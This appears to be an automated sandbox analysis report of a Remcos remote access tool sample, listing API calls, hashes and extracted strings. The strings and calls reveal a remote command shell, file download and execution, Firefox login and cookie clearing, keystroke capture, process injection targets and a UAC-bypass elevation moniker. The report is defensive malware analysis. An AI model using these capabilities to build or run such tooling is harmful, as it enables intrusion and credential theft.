                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction ID: 373609c7fd307ef06685ff80add0f5f843e46d53b934b4a801672e3e55fe8bac
                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction Fuzzy Hash: C6D01231545228B7D7412A94DC09BCD7B5CDF05B66F008011FB0DD9481C770954046E5
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                  • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                  • Opcode Fuzzy Hash: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                  • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 005304B6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295009749.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction ID: 65363229aa5d9e0f7056bc36345532fa00e747c09c57f64967f3a62b089b4861
                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction Fuzzy Hash: 10112B79A40208EFDB01DF98C985E98BFF5AF08750F058094FA489B362D371EA50DF90
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                  • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                    • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                    • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                    • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                    • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                    • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                    • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                    • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                    • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                    • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                    • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                  • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                    • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                    • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                    • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                  • Sleep.KERNEL32(000007D0), ref: 00407976
                                                  • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                    • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                  • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                  • API String ID: 2918587301-599666313
                                                  • Opcode ID: abbbf9720a01dc55ebef3b52bea707bace41c667e9f8aeb14689948fdfb88dc7
                                                  • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                  • Opcode Fuzzy Hash: abbbf9720a01dc55ebef3b52bea707bace41c667e9f8aeb14689948fdfb88dc7
                                                  • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 0040508E
                                                    • Part of subcall function 004334CF: RtlEnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                    • Part of subcall function 004334CF: RtlLeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  • __Init_thread_footer.LIBCMT ref: 004050CB
                                                  • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                  • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                    • Part of subcall function 00433519: RtlEnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                    • Part of subcall function 00433519: RtlLeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                    • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                  • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                  • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                  • CloseHandle.KERNEL32 ref: 004053CD
                                                  • CloseHandle.KERNEL32 ref: 004053D5
                                                  • CloseHandle.KERNEL32 ref: 004053E7
                                                  • CloseHandle.KERNEL32 ref: 004053EF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                  • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                  • API String ID: 3815868655-81343324
                                                  • Opcode ID: a852e97d51634d027372abbadf4744862e9a15ee51a7d59a2ccf7494b6424d00
                                                  • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                  • Opcode Fuzzy Hash: a852e97d51634d027372abbadf4744862e9a15ee51a7d59a2ccf7494b6424d00
                                                  • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                  APIs
                                                  • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                    • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                    • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                    • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                  • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                    • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                    • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                    • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                  • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                  • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                  • API String ID: 65172268-860466531
                                                  • Opcode ID: 4e8f88480e695f0b008eedc59160f23e6e311b24a71d4df8cbec1ea9793d479a
                                                  • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                  • Opcode Fuzzy Hash: 4e8f88480e695f0b008eedc59160f23e6e311b24a71d4df8cbec1ea9793d479a
                                                  • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                  • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                  • FindClose.KERNEL32(00000000), ref: 0040B517
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                  • API String ID: 1164774033-3681987949
                                                  • Opcode ID: b584019745e8484aa2f1f86582a070c659bd219e03dd8eaa35b0525f002778b6
                                                  • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                  • Opcode Fuzzy Hash: b584019745e8484aa2f1f86582a070c659bd219e03dd8eaa35b0525f002778b6
                                                  • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                  APIs
                                                  • NtdllDefWindowProc_A.USER32(?,00000401,?,?), ref: 0041CAE9
                                                  • GetCursorPos.USER32(?), ref: 0041CAF8
                                                  • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                  • Shell_NotifyIcon.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                  • ExitProcess.KERNEL32 ref: 0041CB74
                                                  • CreatePopupMenu.USER32 ref: 0041CB7A
                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyNtdllProc_ProcessShell_Track
                                                  • String ID: Close
                                                  • API String ID: 1665278180-3535843008
                                                  • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                  • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                  • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                  • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                  • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                  • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                  • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$Close$File$FirstNext
                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                  • API String ID: 3527384056-432212279
                                                  • Opcode ID: d079bd86303ea68401695b21b34f6fe3fafa40d975d36afa8547e805b24be126
                                                  • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                  • Opcode Fuzzy Hash: d079bd86303ea68401695b21b34f6fe3fafa40d975d36afa8547e805b24be126
                                                  • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                  • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                    • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                    • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                    • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                  • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                  • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                  • API String ID: 726551946-3025026198
                                                  • Opcode ID: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                  • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                  • Opcode Fuzzy Hash: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                  • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 004159C7
                                                  • EmptyClipboard.USER32 ref: 004159D5
                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                  • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                  • CloseClipboard.USER32 ref: 00415A5A
                                                  • OpenClipboard.USER32 ref: 00415A61
                                                  • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                  • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                  • CloseClipboard.USER32 ref: 00415A89
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                  • String ID:
                                                  • API String ID: 3520204547-0
                                                  • Opcode ID: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                  • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                  • Opcode Fuzzy Hash: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                  • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                  APIs
                                                  • NtdllDefWindowProc_A.NTDLL(?,00000401,?,?), ref: 0210CD50
                                                  • GetCursorPos.USER32(?), ref: 0210CD5F
                                                  • SetForegroundWindow.USER32(?), ref: 0210CD68
                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0210CD82
                                                  • Shell_NotifyIcon.SHELL32(00000002,00473B50), ref: 0210CDD3
                                                  • ExitProcess.KERNEL32 ref: 0210CDDB
                                                  • CreatePopupMenu.USER32 ref: 0210CDE1
                                                  • AppendMenuA.USER32(00000000,00000000,00000000,0046C11C), ref: 0210CDF6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyNtdllProc_ProcessShell_Track
                                                  • String ID:
                                                  • API String ID: 1665278180-0
                                                  • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                  • Instruction ID: dcfcda078f8b611041f2c0a0c358ecbe83ef891394394bf764188e4d4bdfa802
                                                  • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                  • Instruction Fuzzy Hash: BE210C3114420AFFDB195F64ED4EAAA3F75EB04302F004235B906A40B2D7B6DA61EF98
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$1$2$3$4$5$6$7
                                                  • API String ID: 0-3177665633
                                                  • Opcode ID: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                  • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                  • Opcode Fuzzy Hash: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                  • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 00409B3F
                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                  • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                  • GetKeyState.USER32(00000010), ref: 00409B5C
                                                  • GetKeyboardState.USER32(?), ref: 00409B67
                                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                  • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                  • String ID: 8[G
                                                  • API String ID: 1888522110-1691237782
                                                  • Opcode ID: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                  • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                  • Opcode Fuzzy Hash: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                  • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 00406788
                                                  • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Object_wcslen
                                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                  • API String ID: 240030777-3166923314
                                                  • Opcode ID: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                  • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                  • Opcode Fuzzy Hash: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                  • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                  APIs
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                  • GetLastError.KERNEL32 ref: 00419935
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                  • String ID:
                                                  • API String ID: 3587775597-0
